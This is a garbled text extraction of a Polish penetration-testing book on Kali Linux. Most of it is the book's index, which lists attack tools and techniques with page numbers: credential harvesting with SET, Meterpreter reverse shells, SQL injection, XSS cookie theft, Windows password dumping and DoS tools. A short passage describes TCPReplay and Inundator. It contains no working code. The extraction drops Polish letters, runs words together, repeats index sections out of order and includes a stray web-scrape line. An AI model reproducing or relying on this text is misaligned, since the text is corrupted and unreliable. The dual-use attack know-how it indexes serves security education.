adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 47: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

